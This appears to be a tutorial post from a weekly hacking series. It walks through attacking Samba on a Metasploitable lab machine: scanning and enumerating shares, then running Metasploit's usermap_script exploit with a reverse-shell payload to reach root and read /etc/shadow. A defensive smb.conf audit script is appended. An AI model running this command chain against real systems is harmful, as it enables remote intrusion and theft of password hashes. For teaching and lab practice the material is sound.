#HackOnTuesday Episode 5 Attacking Samba with Metasploit

Every week we share techniques and tools for attacking the services most commonly used by companies all around the world, such as Apache, MySQL, PostgreSQL, etc. In this episode, Gianni turns his attention to Samba. After a short introduction on how to find all the computers that have open shares, he moves on to show how to get the NetBIOS name of a host, list the shares available on the host, download files from a share, and exploit vulnerable Samba instances.

Tools, Scripts, and Exploits
» Identify all the computers that have open shares
   • nmap -v -sV -p 139
» Get the Netbios name of the target machine
   • nmblookup -A
» Get the list of shares available on the target machine
   • smbclient -L \\METASPLOITABLE -I -N
» Inspect the tmp share
   • smbclient //METASPLOITABLE/tmp -I -N
   • dir
   • cd .ICE-unix
   • dir
   • cd ..
   • cd .X11-unix
   • dir
   • exit
» Use Metasploit's usermap_script module to get code execution
   • msfconsole
   • use exploit/multi/samba/usermap_script
   • show options
   • set RHOST
   • show payloads
   • set PAYLOAD cmd/unix/reverse
   • show options
   • /sbin/ifconfig
   • set LHOST
   • exploit
» Get root
   • whoami
   • cat /etc/shadow
» Game over!
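As an added defender-side check, not part of the episode: this Python script audits an smb.conf for the two settings the chain above relies on, the `username map script` directive that the usermap_script module abuses and the guest access that lets `smbclient -N` browse a share with no password. The directive names are Samba's own; the two sample configurations are constructed for the example.

```python
# Added example, not from the episode: flag the smb.conf settings that make the
# usermap_script chain possible (a username map script plus anonymous share access).
import re


def parse_smb_conf(text):
    """Minimal smb.conf parser: [section] headers, key = value lines,
    '#'/';' comments. Keys are lower-cased with whitespace collapsed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return findings (an empty list means none of the risky settings is on)."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    if glob.get("username map script"):
        findings.append("global: 'username map script' is set; remove it")
    if glob.get("map to guest", "never").lower() != "never":
        findings.append("global: 'map to guest' permits unauthenticated sessions")
    for name, sec in conf.items():
        guest = sec.get("guest ok", glob.get("guest ok", "no")).lower()
        if name != "global" and guest in ("yes", "true", "1"):
            findings.append(f"[{name}]: 'guest ok = yes' allows anonymous browsing")
    return findings


# Constructed sample configurations (assumption, not taken from any real host).
WEAK_CONF = """[global]
   map to guest = bad user
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
"""
HARDENED_CONF = """[global]
   map to guest = never
[tmp]
   guest ok = no
"""
```

Run `audit_smb_conf` over the real `/etc/samba/smb.conf` of a host; an empty result means the settings this episode's exploit depends on are not enabled.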